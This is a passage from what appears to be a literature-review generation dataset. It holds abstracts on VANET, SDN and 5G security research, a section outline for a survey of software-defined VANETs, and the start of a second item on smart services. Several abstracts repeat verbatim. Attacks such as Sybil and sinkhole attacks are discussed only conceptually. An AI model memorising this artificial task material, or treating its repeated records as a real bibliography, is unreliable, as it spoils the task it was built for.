robust approach is presented to defend against Sybil attack. Proposed scheme localizes the fake identities of malicious vehicles by analyzing the consistent similarity in neighborhood information of neighbors of these fake identities. Beacon packets are exchanged periodically by all the vehicles to announce their presence and get aware of neighboring nodes. Each node periodically keep a record of its neighboring nodes. In proposed approach, each node exchange groups of its neighboring nodes periodically and perform the intersection of these groups. If some nodes observe that they have similar neighbors for a significant duration of time, these similar neighbors are identified as Sybil nodes. Proposed approach is able to locate Sybil nodes quickly without the requirement of secret information exchange and special hardware support. We evaluate our proposed approach on the realistic traffic scenario. Experiment results demonstrate that detection rate increases when optimal numbers of Sybil nodes are forged by the attacker. --- paper_title: Anomaly traceback using software defined networking paper_content: While the threats in Internet are still increasing and evolving (like intra multi-tenant data center attacks), protection and detection mechanisms are not fully accurate. Therefore, forensics is vital for recovering from an attack but also to identify the responsible entities. Therefore, this paper focuses on tracing back to the sources of an anomaly in the network. In this paper, we propose a method leveraging the Software Defined Networking (SDN) paradigm to passively identify switches composing the network path of an anomaly. As SDN technologies tend to be deployed in the next generation of networks including in data centers, they provide a helpful framework to implement our proposal without developing dedicated routers like usual IP traceback techniques. We evaluated our scheme with different network topologies (Internet and data centers) by considering distributed attacks with numerous hosts. --- paper_title: FRESCO: Modular Composable Security Services for SoftwareDefined Networks paper_content: OpenFlow is an open standard that has gained tremendous interest in the last few years within the network community. It is an embodiment of the software-defined networking paradigm, in which higher-level flow routing decisions are derived from a control layer that, unlike classic network switch implementations, is separated from the data handling layer. The central attraction to this paradigm is that by decoupling the control logic from the closed and proprietary implementations of traditional network switch infrastructure, researchers can more easily design and distribute innovative flow handling and network control algorithms. Indeed, we also believe that OpenFlow can, in time, prove to be one of the more impactful technologies to drive a variety of innovations in network security. OpenFlow could offer a dramatic simplification to the way we design and integrate complex network security applications into large networks. However, to date there remains a stark paucity of compelling OpenFlow security applications. In this paper, we introduce FRESCO, an OpenFlow security application development framework designed to facilitate the rapid design, and modular composition of OF-enabled detection and mitigation modules. FRESCO, which is itself an OpenFlow application, offers a Click-inspired [19] programming framework that enables security researchers to implement, share, and compose together, many different security detection and mitigation modules. We demonstrate the utility of FRESCO through the implementation of several well-known security defenses as OpenFlow security services, and use them to examine various performance and efficiency aspects of our proposed framework. --- paper_title: GSIS: A Secure and Privacy-Preserving Protocol for Vehicular Communications paper_content: In this paper, we first identify some unique design requirements in the aspects of security and privacy preservation for communications between different communication devices in vehicular ad hoc networks. We then propose a secure and privacy-preserving protocol based on group signature and identity (ID)-based signature techniques. We demonstrate that the proposed protocol cannot only guarantee the requirements of security and privacy but can also provide the desired traceability of each vehicle in the case where the ID of the message sender has to be revealed by the authority for any dispute event. Extensive simulation is conducted to verify the efficiency, effectiveness, and applicability of the proposed protocol in various application scenarios under different road systems. --- paper_title: VeCure: A practical security framework to protect the CAN bus of vehicles paper_content: Vehicles are being revolutionized by integrating modern computing and communication technologies in order to improve both user experience and driving safety. As a result, vehicular systems that used to be closed systems are opening up various interfaces, such as Bluetooth, 3G/4G, GPS, etc., to the outside world, thus introducing new opportunities for cyber attacks. It has been recently demonstrated that modern vehicles are vulnerable to several remote attacks launched through Bluetooth and cellular interfaces, allowing the attacker to take full control of the vehicle. The common root cause of these attacks is the lack of message authentication for the vehicle's internal bus system, called Controller Area Network (CAN). In this work, we propose VeCure - a practical security framework for vehicular systems, which can fundamentally solve the message authentication issue of the CAN bus. VeCure is designed to be compatible with existing vehicle system architectures, and employs a trust group structure and a novel message authentication scheme with offline computation capability to minimize online message processing delay and deployment cost. We built a proof-of-concept prototype on a testbed using Freescale's automotive development boards. The experimental results show that VeCure only introduces 50us additional delay to process a message, which is at least 20-fold faster than any existing solution. --- paper_title: Detection and localization of sybil nodes in VANETs paper_content: Sybil attacks have been regarded as a serious security threat to ad hoc networks and sensor networks. They may also impair the potential applications of VANETs (Vehicular Ad hoc Networks) by creating an illusion of traffic congestion. In this paper, we present a lightweight security scheme for detecting and localizing Sybil nodes in VANETs, based on statistic analysis of signal strength distribution. Our scheme is a distributed and localized approach, in which each vehicle on a road can perform the detection of potential Sybil vehicles nearby by verifying their claimed positions. We first introduce a basic signal-strength-based position verification scheme. However, the basic scheme proves to be inaccurate and vulnerable to spoof attacks. In order to compensate for the weaknesses of the basic scheme, we propose a technique to prevent Sybil nodes from covering up for each other. In this technique, traffic patterns and support from roadside base stations are used to our advantage. We, then, propose two statistic algorithms to enhance the accuracy of position verification. The algorithms can detect potential Sybil attacks by observing the signal strength distribution of a suspect node over a period of time. The statistic nature of our algorithms significantly reduces the verification error rate. Finally, we conduct simulations to explore the feasibility of our scheme. --- paper_title: GSIS: A Secure and Privacy-Preserving Protocol for Vehicular Communications paper_content: In this paper, we first identify some unique design requirements in the aspects of security and privacy preservation for communications between different communication devices in vehicular ad hoc networks. We then propose a secure and privacy-preserving protocol based on group signature and identity (ID)-based signature techniques. We demonstrate that the proposed protocol cannot only guarantee the requirements of security and privacy but can also provide the desired traceability of each vehicle in the case where the ID of the message sender has to be revealed by the authority for any dispute event. Extensive simulation is conducted to verify the efficiency, effectiveness, and applicability of the proposed protocol in various application scenarios under different road systems. --- paper_title: Detection and mitigation of sinkhole attacks in wireless sensor networks paper_content: With the advances in technology, there has been an increasing interest in the use of wireless sensor networks (WSNs). WSNs are vulnerable to a wide class of attacks among which sinkhole attack puts severe threats to the security of such networks. This paper proposes two approaches to detect and mitigate such attack in WSNs. It provides a centralized approach to detect suspicious regions in the network using geostatistical hazard model. Furthermore, a distributed monitoring approach has been proposed to explore every neighborhood in the network to detect malicious behaviors. Our simulation experiments validate the correctness and efficiency of the proposed approaches. --- paper_title: P2DAP — Sybil Attacks Detection in Vehicular Ad Hoc Networks paper_content: Vehicular ad hoc networks (VANETs) are being increasingly advocated for traffic control, accident avoidance, and management of parking lots and public areas. Security and privacy are two major concerns in VANETs. Unfortunately, in VANETs, most privacy-preserving schemes are vulnerable to Sybil attacks, whereby a malicious user can pretend to be multiple (other) vehicles. In this paper, we present a lightweight and scalable protocol to detect Sybil attacks. In this protocol, a malicious user pretending to be multiple (other) vehicles can be detected in a distributed manner through passive overhearing by s set of fixed nodes called road-side boxes (RSBs). The detection of Sybil attacks in this manner does not require any vehicle in the network to disclose its identity; hence privacy is preserved at all times. Simulation results are presented for a realistic test case to highlight the overhead for a centralized authority such as the DMV, the false alarm rate, and the detection latency. The results also quantify the inherent trade-off between security, i.e., the detection of Sybil attacks and detection latency, and the privacy provided to the vehicles in the network. From the results, we see our scheme being able to detect Sybil attacks at low overhead and delay, while preserving privacy of vehicles. --- paper_title: Detecting Sybil attacks in VANETs paper_content: Sybil attacks have been regarded as a serious security threat to Ad hoc Networks and Sensor Networks. They may also impair the potential applications in Vehicular Ad hoc Networks (VANETs) by creating an illusion of traffic congestion. In this paper, we make various attempts to explore the feasibility of detecting Sybil attacks by analyzing signal strength distribution. First, we propose a cooperative method to verify the positions of potential Sybil nodes. We use a Random Sample Consensus (RANSAC)-based algorithm to make this cooperative method more robust against outlier data fabricated by Sybil nodes. However, several inherent drawbacks of this cooperative method prompt us to explore additional approaches. We introduce a statistical method and design a system which is able to verify where a vehicle comes from. The system is termed the Presence Evidence System (PES). With PES, we are able to enhance the detection accuracy using statistical analysis over an observation period. Finally, based on realistic US maps and traffic models, we conducted simulations to evaluate the feasibility and efficiency of our methods. Our scheme proves to be an economical approach to suppressing Sybil attacks without extra support from specific positioning hardware. --- paper_title: Distance-Based Scheme for Broadcast Storm Mitigation in Named Software Defined Vehicular Networks (NSDVN) paper_content: Computer networking field is evolving day by day and new techniques like named data network (NDN), software defined network (SDN) and vehicular ad-hoc networks (VANETs) are gaining attention due to their enhanced functionalities over traditional networks. NDN is a new paradigm which mitigates the IPv4 addressing limitations due to its better and flexible mechanism. In NDN, communication between different nodes occur with the help of content names rather than IP addresses. On the other hand, SDN provides more control and manages the network efficiently by decoupling data and control plane. Communication in VANETs contains two parts (i) V2V (vehicle-to-vehicle) (ii) V2I (vehicle-to-infrastructure). In V2V, communication between different vehicles carry out by vehicles itself while in V2I it can be done through road side units (RSU). Broadcast storm problem occurs when same packets were flooded by each vehicle. With the help of both NDN and SDN in VANETs, broadcast storm problem can be solved. In this paper, we introduced a new technique named as Broadcast Storm Avoidance Mechanism (BSAM) to mitigate the broadcast storm issue. Proposed scheme is evaluated through simulations which show the better results of BSAM as compared to native VNDN in terms of average number of interest packets transmission and average end-to-end delay. --- paper_title: Mobility management approaches for SDN-enabled mobile networks paper_content: The evolving network technologies aim at meeting the envisioned communication demands of future smart cities and applications. Although software-defined networking (SDN) enables flexible network control, its applicability to mobile networks is still in its infancy. When it comes to introducing the SDN vision to mobile networks, handling of wireless events and mobility management operations stand out as major challenges. In this paper, we study the scalability issues of SDNized wireless networks, specifically those relevant to mobility management. We design and implement different mobility management approaches in SDNized wireless networks and investigate the impact of various system variables on the overall handover delays. We also study the improvements in handover delays: (i) when a proposed proactive mobility management algorithm is implemented; (ii) when the controller delegates partial control of mobility management to the forwarding entities. For the implementation of the proposed approaches on the OpenFlow network, the paper also suggests potential extensions to the OpenFlow protocol. The contributed approaches are validated on a full-scale demonstrator, with results showing that proactive outperforms reactive and that the delegated control approach performs better than proactive for smaller topology sizes. Furthermore, a proposal for LTE X2-specific control delegation is discussed as a use case. --- paper_title: Delay-Minimization Routing for Heterogeneous VANETs With Machine Learning Based Mobility Prediction paper_content: Establishing and maintaining end-to-end connections in a vehicular ad hoc network (VANET) is challenging due to the high vehicle mobility, dynamic inter-vehicle spacing, and variable vehicle density. Mobility prediction of vehicles can address the aforementioned challenge, since it can provide a better routing planning and improve overall VANET performance in terms of continuous service availability. In this paper, a centralized routing scheme with mobility prediction is proposed for VANET assisted by an artificial intelligence powered software-defined network (SDN) controller. Specifically, the SDN controller can perform accurate mobility prediction through an advanced artificial neural network technique. Then, based on the mobility prediction, the successful transmission probability and average delay of each vehicle's request under frequent network topology changes can be estimated by the roadside units (RSUs) or the base station (BS). The estimation is performed based on a stochastic urban traffic model in which the vehicle arrival follows a non-homogeneous Poisson process. The SDN controller gathers network information from RSUs and BS that are considered as the switches. Based on the global network information, the SDN controller computes optimal routing paths for switches (i.e., BS and RSU). While the source vehicle and destination vehicle are located in the coverage area of the same switch, further routing decision will be made by the RSUs or the BS independently to minimize the overall vehicular service delay. The RSUs or the BS schedule the requests of vehicles by either vehicle-to-vehicle or vehicle-to-infrastructure communication, from the source vehicle to the destination vehicle. Simulation results demonstrate that our proposed centralized routing scheme outperforms others in terms of transmission delay, and the transmission performance of our proposed routing scheme is more robust with varying vehicle velocity. --- paper_title: Security Challenges in Future NDN-Enabled VANETs paper_content: Originally envisioned to tackle the massive content distribution in today's Internet, the Information-Centric Networking (ICN) has turned out to be a promising paradigm for different network scenarios, including Vehicular Ad Hoc Networks (VANETs). Data retrieval independent from specific recipients bound to fixed physical locations could be a key enabler for future vehicular networks, fixing old unsolved issues of mobility management in classical IP-based systems. As an evidence, several preliminary investigations have been performed on a widely known ICN instance, i.e., the Named-Data Networking (NDN). Nevertheless, the NDN architecture presents a new set of security vulnerabilities. Interest flooding attacks, cache poisoning attacks and privacy violation attacks by means of content names represent concrete NDN threats. While the benefits offered by NDN to vehicular networks have been partially investigated, the impact of major security threats stays unclear. Therefore, this paper opens a more comprehensive discussion of the security risks brought by the application of NDN solutions in VANETs. This is a fundamental first step toward the future design of suitable related countermeasures. --- paper_title: Realization of VANET-Based Cloud Services through Named Data Networking paper_content: Connected car technology (also referred to as VANET) has gradually paved its way to legislation in several countries and soon will be followed by mass-scale deployment. However, the race between the advancements in technologies and utilization of the available resources have left a question mark on the future of pure VANET. Therefore, the research community together with academia and industry have foreseen the evolution of VANET into VANET-based clouds. The data- or content-centric communication paradigm is the point of convergence in these technologies because the content is shared among different nodes in different forms such as infotainment or safety. However, the current IP-based networking is not an ideal choice for content-centric applications because of its larger overhead for establishing, maintaining, and securing the path, addressing complexity, non-scalability for content, routing and mobility management overhead, and so on. Therefore, the limitations and shortcomings of current IP-based networking and the need for efficient content delivery advocate for a paradigm shift. To this end, a new content-centric networking paradigm, namely NDN, has been employed to address the aforementioned issues related to content-centric networking while using IP-based networking. In this article, we foresee the integration of VANET-based clouds with NDN called NDN-VC for reliable, efficient, robust, and safe intelligent transportation systems. We particularly aim at the architecture and concise naming mechanism for NDN-VC. Furthermore, we also outline the unique future challenges faced by the NDN-VC. --- paper_title: Network Slicing to Enable Scalability and Flexibility in 5G Mobile Networks paper_content: We argue for network slicing as an efficient solution that addresses the diverse requirements of 5G mobile networks, thus providing the necessary flexibility and scalability associated with future network implementations. We elaborate on the challenges that emerge when we design 5G networks based on network slicing. We focus on the architectural aspects associated with the coexistence of dedicated as well as shared slices in the network. In particular, we analyze the realization options of a flexible radio access network with focus on network slicing and their impact on the design of 5G mobile networks. In addition to the technical study, this paper provides an investigation of the revenue potential of network slicing, where the applications that originate from such concept and the profit capabilities from the network operator's perspective are put forward. --- paper_title: Mobile Edge Computing, Fog et al.: A Survey and Analysis of Security Threats and Challenges paper_content: Abstract For various reasons, the cloud computing paradigm is unable to meet certain requirements (e.g. low latency and jitter, context awareness, mobility support) that are crucial for several applications (e.g. vehicular networks, augmented reality). To fulfill these requirements, various paradigms, such as fog computing, mobile edge computing, and mobile cloud computing, have emerged in recent years. While these edge paradigms share several features, most of the existing research is compartmentalized; no synergies have been explored. This is especially true in the field of security, where most analyses focus only on one edge paradigm, while ignoring the others. The main goal of this study is to holistically analyze the security threats, challenges, and mechanisms inherent in all edge paradigms, while highlighting potential synergies and venues of collaboration. In our results, we will show that all edge paradigms should consider the advances in other paradigms. --- paper_title: Network Slicing Based 5G and Future Mobile Networks: Mobility, Resource Management, and Challenges paper_content: 5G networks are expected to be able to satisfy users' different QoS requirements. Network slicing is a promising technology for 5G networks to provide services tailored for users' specific QoS demands. Driven by the increased massive wireless data traffic from different application scenarios, efficient resource allocation schemes should be exploited to improve the flexibility of network resource allocation and capacity of 5G networks based on network slicing. Due to the diversity of 5G application scenarios, new mobility management schemes are greatly needed to guarantee seamless handover in network-slicing-based 5G systems. In this article, we introduce a logical architecture for network-slicing-based 5G systems, and present a scheme for managing mobility between different access networks, as well as a joint power and subchannel allocation scheme in spectrum-sharing two-tier systems based on network slicing, where both the co-tier interference and cross-tier interference are taken into account. Simulation results demonstrate that the proposed resource allocation scheme can flexibly allocate network resources between different slices in 5G systems. Finally, several open issues and challenges in network-slicing-based 5G networks are discussed, including network reconstruction, network slicing management, and cooperation with other 5G technologies. --- paper_title: Infrastructure-Assisted Communication for NDN-VANETs paper_content: Vehicular Ad-Hoc Networks (VANETs) include services such as video streaming for automated safety precautions and autonomous driving. NDN is proposed in VANETs as a solution for the connection breaks, since NDN decouples the content exchange from the location of the host. The combination of NDN and VANETs leads to autonomous ad-hoc network architectures that are self-managed. In this paper, we apply the NDN architecture in VANETs, to retrieve information from other vehicles and to save network resources. We present a Vehicle to Infrastructure (V2I) communication architecture for NDN-VANETs, which consists of vehicles and Road Side Units (RSUs). For installed RSUs along the roads we develop two communication techniques: First, in the centralized approach every node that requests content sends its Interests to the nearest RSU. RSUs are responsible for routing the Interests to the content source. In our second approach, a hybrid communication technique uses RSUs as a backup mechanism and forwards packets to them, if a route to the content source is unavailable. We compare our approaches with our previous work iMMM-VNDN, flooding and AODV. Our results show that we outperform previous works in terms of Interest Satisfaction Ratio and the total amount of Delivered Data in the requester node. --- paper_title: A Framework for Experimenting ICN over SDN Solutions using Physical and Virtual Testbeds paper_content: ABSTRACT Information Centric Networking (ICN) is a paradigm in which the network layer provides users with access to content by names, instead of providing communication channels between hosts. The ICN paradigm promises to offer a set of advantages with respect to existing (IP) networks for the support of the large majority of current traffic. In this paper, we consider the deployment of ICN by exploiting the Software Defined Networking (SDN) architecture. SDN is characterized by a logically centralized control plane and a well-defined separation between data and control planes. An SDN-enabled network facilitates the introduction of ICN functionality, without requiring a complex transition strategy and the re-deployment of new ICN capable hardware. More in details, in this paper we provide: i) a solution to support ICN by exploiting SDN, extending a previous work of ours; ii) design and implement an open reference environment to deploy and test the ICN over SDN solutions over local and distributed testbeds; iii) design and implementation of a set of Caching policies that leverage on the ICN over SDN approach; iv) performance evaluation of key aspects of the ICN over SDN architecture and of the designed caching policies. All the source code and the monitoring suite are publicly available. To the best of our knowledge, there are no other similar solutions available in Open Source, nor similar emulation platforms, including also a comprehensive set of monitoring tools. --- paper_title: NFV: Security Threats and Best Practices paper_content: Network function virtualization (NFV) yields numerous benefits, particularly the possibility of a cost-efficient transition of telco hardware functionalities on the software platform to break the vendor lock-in problem. These benefits come at the price of some security flaws. Indeed, with NFV, virtual mobile networks become vulnerable to a number of security threats. These threats can be leveraged using some available mitigation techniques and also through other emerging solutions. This article presents critical security threats that exist in the NFV infrastructure, proposes best security practices to protect against them. ---
Title: A Survey on Software-Defined VANETs: Benefits, Challenges, and Future Directions Section 1: INTRODUCTION Description 1: Introduce the development of vehicular ad-hoc networks (VANETs) and their integration with Software Defined Networking (SDN) to address emerging challenges in intelligent transportation systems. Section 2: BACKGROUND OVERVIEW Description 2: Provide a brief overview of VANET and SDN technologies, discussing their basic principles, benefits, and challenges. Section 3: SDN BASED VEHICULAR NETWORKS Description 3: Present a systematic survey on the state-of-the-art SDN-based VANET (SDVN) architectures, highlighting their design, benefits, and challenges. Section 3.1: Overview of state-of-the-art SDVN Architectures Description 3.1: Conduct a comprehensive survey on existing research, describing proposed SDVN architectures and their working methodologies. Section 3.2: Benefits and Challenges Description 3.2: Discuss the major benefits and research challenges extracted from the survey of SDVN architectures, focusing on aspects such as resource utilization, network configuration, and security. Section 4: SDVNS SECURITY ANALYSIS & COUNTERMEASURES Description 4: Analyze the security threats and vulnerabilities in SDVN architectures and discuss possible countermeasures to mitigate these risks. Section 4.1: Control Plane Resource Consumption Description 4.1: Discuss the issue of control plane resource consumption in SDVNs and explore countermeasures to handle excessive requests from the data plane. Section 4.2: Network Topology Poisoning Description 4.2: Analyze the implications of network topology poisoning attacks and review existing solutions to prevent such threats. Section 4.3: Distributed Denial of Service Attacks Description 4.3: Evaluate the vulnerability of SDVN architectures to DDoS attacks and propose relevant defense mechanisms. Section 4.4: Rule conflicts violating existing security policies Description 4.4: Discuss how rule conflicts might arise in SDVN architectures and explore techniques to reconcile these conflicts. Section 4.5: Privacy Description 4.5: Highlight privacy concerns related to user information in SDVNs and suggest privacy-preserving mechanisms. Section 4.6: Forgery Description 4.6: Describe the threat of message forgery in SDVNs and outline methods to ensure secure information dissemination. Section 4.7: Tampering Description 4.7: Address the issue of tampering with in-transit messages and propose approaches for anomaly detection in data packets. Section 4.8: Jamming Description 4.8: Discuss how jamming attacks can disrupt SDVN operations and propose strategies to mitigate such attacks. Section 4.9: Impersonation Description 4.9: Analyze impersonation attacks in SDVNs and review techniques for detecting and preventing these attacks. Section 4.10: Application-based attacks Description 4.10: Inspect attacks on specific vehicular applications like smart grid and platoon management and propose SDVN-based solutions for detection and mitigation. Section 4.11: Malware Attack Injection Description 4.11: Review the threat posed by malware injection in SDVNs and suggest frameworks for enhancing the security of vehicular systems. Section 4.12: Routing based Attacks Description 4.12: Evaluate routing-based attacks such as sinkhole, sybil, and replay attacks in SDVNs and discuss effective countermeasures. Section 5: DISCUSSION AND OPEN ISSUES Description 5: Summarize the findings from the review of SDVN architectures, discuss lessons learned, and outline the future research challenges and directions. Section 6: CONCLUSIONS Description 6: Conclude the survey by summarizing the key contributions of the study, highlighting the potential of SDN to support advanced VANET applications, and outlining the future research directions.
Focusing the customer through smart services: a literature review
9
--- paper_title: Enhancing Literature Review Methods - Evaluation of a Literature Search Approach based on Latent Semantic Indexing paper_content: Literature search, as a fundamental and time"consum ing step in a literature research process, is part of many established scientific research methods. The facilitated access to scientific resources requires an increasing effort to conduct comprehensive literature reviews. We address the lack of semantic approaches in this context by proposing and evaluating our Tool for Semantic Indexing and Similarity Queries (TSISQ) for the enhancement of established literature review methods. Its applicability is evaluated in different environments and search cases covering realistic applications. Results indicate that TSISQ can increase efficiency by saving valuable time in finding relevant literature in a desired research field, improve the quality of search results, and enhance the comprehensiveness of a review by identifying sources that otherwise would not have been considered. The target audience includes all researchers who need to efficiently gain an overview of a specific research field and refine the theoretical foundations of their research. --- paper_title: Scalable analysis of collective behaviour in smart service systems paper_content: The long term vision of smart service systems in which electronic environments are made sensitive and responsive to the presence of, possibly many, people is gradually taking shape through a number of pilot projects. The purposes of such systems vary from intelligent homes that assist their inhabitants to make their lives more independent and comfortable to much larger environments such as airports in which people are provided with context aware, personalised, adaptive and anticipatory services that are most relevant for them given their location and their current activities. This paper is concerned with the exploration of scalable formal models that can address the collective behaviour of a large number of people moving through a smart environment. --- paper_title: Smart Services Classification Framework paper_content: The main goal of the study is development of the classification framework of smart service attributes as a first step in developing methodology of smart services implementation for Enterprise Information Portal (EIP) maintenance. First, we analyze available definitions of the "smart services" concept and concepts related to it: smart services are based on the idea of co-creation of value and rely on machine intelligence in connected systems. Second, we describe attributes of EIP services. Finally, we propose a new extended approach of the smart service attributes classification based on the list of characteristics of the EIP services. Our results contribute to the field of smart service research as well as to EIP- related studies both for academics and practitioners, as the proposed classification framework could serve as a basis for creation of smart services typology for the purpose of EIP maintenance. --- paper_title: Analyzing the past to prepare for the future: Writing a literature review paper_content: A review of prior, relevant literature is an essential feature of any academic project. An effective review creates a firm foundation for advancing knowledge. It facilitates theory development, closes areas where a plethora of research exists, and uncovers areas where research is needed. --- paper_title: Enhancing Soa With Service Lifecycle Management - Towards A Functional Reference Model paper_content: Service-orientation is a paradigm aiming at decomposing monolithic application systems into services, i.e. functional units that adhere to certain criteria such as standardized interfaces and the ability to be flexibly combined with each other. With the growing importance and diffusion of this paradigm, the management of an increasing number of services along their lifecycle (Service Lifecycle Management - SLM) is becoming a success factor. Although comprehensive IT support is not the only ingredient for successfully managing services, it is a contribution to compensate for the growing complexity. Surprisingly, the topic of software application support in SLM has not yet received systematic coverage in the literature from a functional perspective. Consequently, this paper proposes a functional reference model for SLM and describes the underlying design process. The model supports practitioners in analyzing, designing and implementing software support for SLM. Further it enables to compare and evaluate existing software solutions and as such it supports IT investment decisions. Scientifically the model represents an approach towards designing information systems in the area of SLM. The paper argues that companies should pursue a best-of-breed approach, as there is no single solution available that comprehensively supports the entire lifecycle. Further, the lack of application support of SLM in practice mainly stems from the absence of integrated solutions and missing knowledge on how to evaluate potential applications. --- paper_title: Internet of things: from internet scale sensing to smart services paper_content: The internet of things (IoT) is the latest web evolution that incorporates billions of devices (such as cameras, sensors, RFIDs, smart phones, and wearables), that are owned by different organizations and people who are deploying and using them for their own purposes. Federations of such IoT devices (we refer to as IoT things) can deliver the information needed to solve internet-scale problems that have been too difficult to obtain and harness before. To realize this unprecedented IoT potential, we need to develop IoT solutions for discovering the IoT devices each application needs, collecting and integrating their data, and distilling the high value information each application needs. We also need to provide solutions that permit doing these tasks in real-time, on the move, in the cloud, and securely. In this paper we present an overview of a collection of IoT solutions (which we have developed in partnerships with other prominent IoT innovators and refer to them collectively as IoT platform) for addressing these technical challenges and help springboard IoT to its potential. We also describe a variety of IoT applications that have utilized the proposed IoT platform to provide smart IoT services in the areas of smart farming, smart grids, and smart manufacturing. Finally, we discuss future research and a vision of the next generation IoT infrastructure. --- paper_title: Smart servitization within the context of industrial user–supplier relationships: contingencies according to a machine tool manufacturer paper_content: Advanced manufacturing technologies (AMT) have been hailed as enablers to make industrial products and operations smart. The present paper argues that AMT can not only form a lever for developing smart goods and smart production environments, but can likewise form a basis to offer smart services and to propose servitized earning or payment models to industrial users. We do so on the basis of a literature review, followed by a case-based analysis of the AMT and servitization challenges to which a machine tool manufacturer is exposed in its industrial market environment. Consequently, the present study identifies a set of contingencies c.q. catalyzers with regard to seizing AMT for smart servitization practices within industrial business-to-business contexts. These are: the ability to capture relevant data; to exploit such data adequately and convert them into actionable knowledge; and to build trust among users and producers of capital goods in order to come to effective data exchange. We finish by deriving implications for smart servitization in a manufacturing context, and by outlining case-based lessons on how AMT and servitization can further interactive design and manufacturing practices in an industrial producer-user setting. We contend that there may be a gap between the technological and organizational readiness of (many) machine tool companies for smart servitization, on the one hand, and what different publications on AMT and Industry 4.0 are trying to make out. We also find that besides the high-tech and big data components to smart servitization, companies with an ambition in this field should take into account minimum/right information principles, to actually get to deep learning, and to establish a culture of trust with business partners, and inside implicated organizations among departments to create an environment in which smart servitized user-supplier relationships can prosper. --- paper_title: Interactions between Service and Product Lifecycle Management paper_content: Abstract The adoption of advanced manufacturing intelligence technologies requires managing the interaction of information in Product-Service Systems (PSS) by combining Product (PLM) and Service Lifecycle Management (SLM). While up to now no sound methodology exists, there is a strong need to have bi-directional coordination and interaction between PLM and SLM in a systematic way. A further challenge is to close loops, for example feedback from service delivery to the beginning-of-life phase of products. The objective of this paper is therefore to identify the interactions between SLM and PLM in manufacturing firms, based on expert interviews and illustrated in PSS use cases. --- paper_title: High Tech and High Touch: A Framework for Understanding User Attitudes and Behaviors Related to Smart Interactive Services paper_content: Smart interactive services, in contrast with other technology-based services, require significant human-to-human interaction and collaboration in addition to the service provided by the embedded technology itself. The authors’ foundational Delphi study confirms smart interactive services (e.g., remote diagnosis, remote repair of equipment, and telemedicine) are a rapidly growing innovation category across industries. Yet, gaining user acceptance of these types of services presents a significant challenge for managers. To address this challenge, the authors employ a grounded theory approach, drawing on depth interviews, to develop a framework of barriers and facilitators to users’ attitudinal and behavioral responses to smart interactive services. The findings reveal a new set of beliefs that are critical in this context. These beliefs are tied to the human element and specifically pertain to beliefs about the “service counterpart (SC),” who is the provider’s employee controlling the technology. Control, t... --- paper_title: SCUOLA project: The “hub of smart services” for cities and communities paper_content: To evolve existing networks present in a city (electric, gas, water, public lighting and transport) may allow a rational use of natural resources (wind and sun), a reduction of consumption (energy efficiency) as well as the evolution of the energy vectors, obtained using ICT (Information and Communications Technology) as enabling technology. The city, seen as a collection of interconnected networks, can make possible the interaction among the different networks, and between citizens and the city, with the aim of making the city more suitable to the needs of the citizens; the citizens are committed in the creation of new sustainable cities through the development of communication technologies. The aim of SCUOLA project is to test an advanced system that can integrate and coordinate the development of smart grids, RES (Renewable Energy Sources), energy efficiency (from the point of view of both heat and electricity) and services to the citizen. --- paper_title: Four strategies for the age of smart services. paper_content: Most industrial manufacturers realize that the real money isn't in products but in services. Companies such as General Electric and IBM have famously made the transition: A large proportion of their revenues and margins come from providing value-added services to customers. But other companies attempting to do the same might miss the boat. It is not enough, the authors say, just to provide services. Businesses must now provide "smart services"--building intelligence (awareness and connectivity) into the products themselves. Citing examples such as Heidelberger Druckmaschinen's Internet-connected printing presses and Eaton Electrical's home-monitoring service, the authors demonstrate how a product that can report its status back to its maker represents an opportunity for the manufacturer to cultivate richer, longer-term relationships with customers. Four business models will emerge in this new, networked world. If you go it alone, it may be as an embedded innovator- that is, your networked product sends back information that can help you optimize service delivery, eliminate waste and inefficiency, and raise service margins. Or, you may pursue a more aggressive solutionist business model- that is, you position your networked product as a "complete solution provider," able to deliver a broader scope of high-value services than those provided by the embedded innovator's product. In the case of a system that aggregates and processes data from multiple products in a building or home, you may be either an aggregator or a synergist, partnering with others to pursue a smart-services opportunity. An aggregator's product is the hub, collecting and processing usage information- and creating a high-value body of data. A synergist's product is the spoke, contributing valuable data or functionality. Woe to the company that takes none of these paths; it'll soon find its former customers locked in--and happily--to other smart service providers. --- paper_title: A software framework for enabling smart services paper_content: ‘Smart’ becomes a buzzword in many sectors of the society. Among them, Smart Service is an emerging paradigm for delivering services with ‘smartness’ features. A key ingredient of smart services is various types of contexts including mobile and social contexts. With the advent of sensor technology and availability in mobile devices, contexts become a key source of information from which situations can be inferred. And, situation-specific services have a high potential of being smart services. However, a number of fundamental technical issues remain unresolved, especially in the area of software framework for developing and deploying smart services. In this paper, we present a software framework for context-aware smart life services, Smart Service Framework (SSF). We begin by defining smart services with key characteristics, and define our architectural design of the SSF. We also define a process for provisioning smart services. And, we specify guidelines and algorithms needed for carrying out the four activities in the process. --- paper_title: Ubiquitous Infrastructure and Smart Service on City Gas Environments in Korea paper_content: The information technology paradigm shifts to smart service environment, as ubiquitous technologies are used in the latest industry trend. The major features of ubiquitous smart service are high dynamism and heterogeneity of their environment and the need for context awareness. In order to resolve these features, it is necessary to develop middleware that meet various new requirements. This paper designed middleware on ubiquitous smart service for enhancing the safety and reliability to city gas environment in Korea. The object of this paper will support cornerstone in order to construct the framework of intelligent infrastructure and service for autonomic management. --- paper_title: Scalable analysis of collective behaviour in smart service systems paper_content: The long term vision of smart service systems in which electronic environments are made sensitive and responsive to the presence of, possibly many, people is gradually taking shape through a number of pilot projects. The purposes of such systems vary from intelligent homes that assist their inhabitants to make their lives more independent and comfortable to much larger environments such as airports in which people are provided with context aware, personalised, adaptive and anticipatory services that are most relevant for them given their location and their current activities. This paper is concerned with the exploration of scalable formal models that can address the collective behaviour of a large number of people moving through a smart environment. --- paper_title: Smart Services Classification Framework paper_content: The main goal of the study is development of the classification framework of smart service attributes as a first step in developing methodology of smart services implementation for Enterprise Information Portal (EIP) maintenance. First, we analyze available definitions of the "smart services" concept and concepts related to it: smart services are based on the idea of co-creation of value and rely on machine intelligence in connected systems. Second, we describe attributes of EIP services. Finally, we propose a new extended approach of the smart service attributes classification based on the list of characteristics of the EIP services. Our results contribute to the field of smart service research as well as to EIP- related studies both for academics and practitioners, as the proposed classification framework could serve as a basis for creation of smart services typology for the purpose of EIP maintenance. --- paper_title: Enhancing Soa With Service Lifecycle Management - Towards A Functional Reference Model paper_content: Service-orientation is a paradigm aiming at decomposing monolithic application systems into services, i.e. functional units that adhere to certain criteria such as standardized interfaces and the ability to be flexibly combined with each other. With the growing importance and diffusion of this paradigm, the management of an increasing number of services along their lifecycle (Service Lifecycle Management - SLM) is becoming a success factor. Although comprehensive 